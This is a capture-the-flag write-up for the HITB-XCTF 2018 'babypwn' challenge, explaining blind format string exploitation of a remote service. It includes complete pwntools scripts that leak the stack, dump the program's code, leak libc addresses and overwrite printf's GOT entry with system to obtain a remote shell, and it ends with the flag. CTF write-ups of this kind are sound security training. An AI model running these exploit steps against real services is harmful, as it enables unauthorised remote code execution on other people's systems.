HITB-XCTF GSEC 2018 Quals: babypwn - Blind Format String Exploitation
By David Buchanan, 13th of April 2018
The only information provided with this challenge was an IP address and port number. No binaries to download! Of course, my first idea was to use netcat to see what it did.
$ nc 47.75.182.113 9999 hello hello %08x 00000000
Typing hello
just resulted in the same input being echoed back.
There's only a limited number of possibilities for this kind of challenge, so
I thought I'd check if format strings did anything.
I entered %08x
, and sure enough the server responded with 00000000
,
demonstrating that the server was passing user input to printf
or a similar
function.
Next, I performed some recon. I wrote a simple script to dump the contents of the stack.
1 2 3 4 5 6 7 | from pwn import * chal = remote("47.75.182.113", 9999) for i in range(1, 512): chal.sendline("%{}$016lx".format(i)) print chal.recvn(16) |
Here's a shortened version of the output from two consecutive runs, side by side, along with some annotations I added:
First run: Second run: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 00007f40930892f0 00007f34706a42f0 <- libc pointer 00007f4093383780 00007f347099e780 00007f40935aa700 00007f3470bc5700 786c363130243625 786c363130243625 <- My format string input 00007fff9e520000 00007ffce58bb700 0000000000000000 0000000000000000 00007fff9e520080 00007ffce58bb720 000000006562b026 000000006562b026 00007f4093149627 00007f3470764627 00000000ffffffff 00000000ffffffff 00007f40935ae718 00007f3470bc9718 00007fff9e595280 00007ffce591a280 00007f40935ae700 00007f3470bc9700 00007fff9e520001 00007ffce58bb701 000108882879431a 0001094ab0b7ba64 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 0000000000000000 00007fff9e520258 00007ffce58bb8f8 0000000000000000 0000000000000000 0000000000000001 0000000000000001 00007fff9e520258 00007ffce58bb8f8 0000000000000001 0000000000000001 00007fff9e520180 00007ffce58bb820 00007f40935ae168 00007f3470bc9168 0000000000f0b5ff 0000000000f0b5ff 0000000000000001 0000000000000001 000000000040076d 000000000040076d <- A return address that points into 00007fff9e52015e 00007ffce58bb7fe the .text segment of the program 0000000000000000 0000000000000000 (presumably) 0000000000400720 0000000000400720 00000000004005a0 00000000004005a0
From this we can gather that the program is likely dynamically linked with libc,
ASLR is on (the libc addresses are different each time), but PIE is off (the
.text
segment addresses are the same each time).
The .text segment likely starts at 0x400000
.
With this information in mind, I wrote a script to dump the program code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | from pwn import * chal = remote("47.75.182.113", 9999) base = 0x400000 leaked = "" while 1: addr = p64(base+len(leaked)) if "\n" in addr: leaked += "\0" print("derp") continue chal.sendline("A"*6 + "%8$s" + "B"*6 + addr) chal.recvuntil("A"*6) leak = chal.recvuntil("B"*6)[:-6] leaked += leak + "\0" print(leak) l = open("leak.bin", "wb") l.write(leaked) l.close() |
Part of the script skips any addresses containing "\n", otherwise my dump would
fail, because the server appeared
to be using it to delimit lines of input.
I left this program running for a couple of minutes, and dumped the first ~2kb
of the .text
segment.
I loaded this dump up in IDA and took a look.
Although the symbol table was part of the data I dumped, it wasn't enough for IDA to import automatically, so I had to name things myself.
The program sits in a loop, reading input onto the stack and printf'ing it.
Although gets()
smashes the stack, the program never returns so it isn't
exploitable.
I decided that the easiest path to exploitation is to replace printf
in the
GOT with a pointer to system
, effectively converting the program into
a system(gets())
loop. But first, I need to find the address of printf
's GOT
entry, which is easy because we can just look at the PLT in IDA:
Next, we need to work out where system
is. To do this, I used format strings
to leak the GOT entries for a few different function calls (See my final exploit
code below), and then fed the information into https://libc.blukat.me/
(A very useful tool!). This revealed that the libc version being used by the
server was
libc6_2.23-0ubuntu10_amd64.so
.
Then all I had to do was write a quick format string generator, and there you have it:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 | from pwn import * libc = ELF("libc6_2.23-0ubuntu10_amd64.so") # derived from leaked .text section got_setbuf = 0x601018 got_printf = 0x601020 got_gets = 0x601028 got_usleep = 0x601030 chal = remote("47.75.182.113", 9999) def leak_addr(addr): print("Leaking...") chal.sendline("%8$s" + "\0"*12 + p64(addr)) return u64(chal.recvn(6) + "\0\0") libc_setbuf = leak_addr(got_setbuf) libc_gets = leak_addr(got_gets) libc_usleep = leak_addr(got_usleep) log.info("libc_setbuf = " + hex(libc_setbuf)) log.info("libc_gets = " + hex(libc_gets)) log.info("libc_usleep = " + hex(libc_usleep)) # calculate libc base address (ASLR) libc.address = libc_setbuf - libc.sym["setbuf"] log.info("libc base = " + hex(libc.address)) # double check we have the correct libc version assert(libc.sym["gets"] == libc_gets) assert(libc.sym["usleep"] == libc_usleep) # now we will overwrite got_printf with libc.sym["system"] nwritten = 0 payload = "" addrs = "" offset = 16 for index, byte in enumerate(bytearray(p64(libc.sym["system"])[:6])): addrs += p64(got_printf+index) num_needed = ((byte - nwritten - 16) & 0xFF) + 16 payload += "%1${}x%{}$hhn".format(num_needed, 6+offset+index) nwritten += num_needed assert(len(payload) <= offset*8) payload += "\0"*((offset*8)-len(payload)) payload += addrs assert("\n" not in payload) chal.sendline(payload) chal.sendline("/bin/sh") chal.interactive() |
Although pwntools does have it's own format string generator, I couldn't get it to work ¯\(ツ)/¯.
The flag was HITB{Baby_Pwn_BabY_bl1nd}
Finally, I dumped the program binary, so now you can run it offline: babypwn
A quick note on how the format string exploit works:
According to man 3 printf
, the %n
formatter means
"The number of characters written so far is stored into the integer pointed to by the corresponding argument."
We can abuse this by putting arbitrary pointers on the stack, printing
a controlled number of bytes, and then using a %n
to get an arbitrary write.
If you want a more detailed explanation, google it :P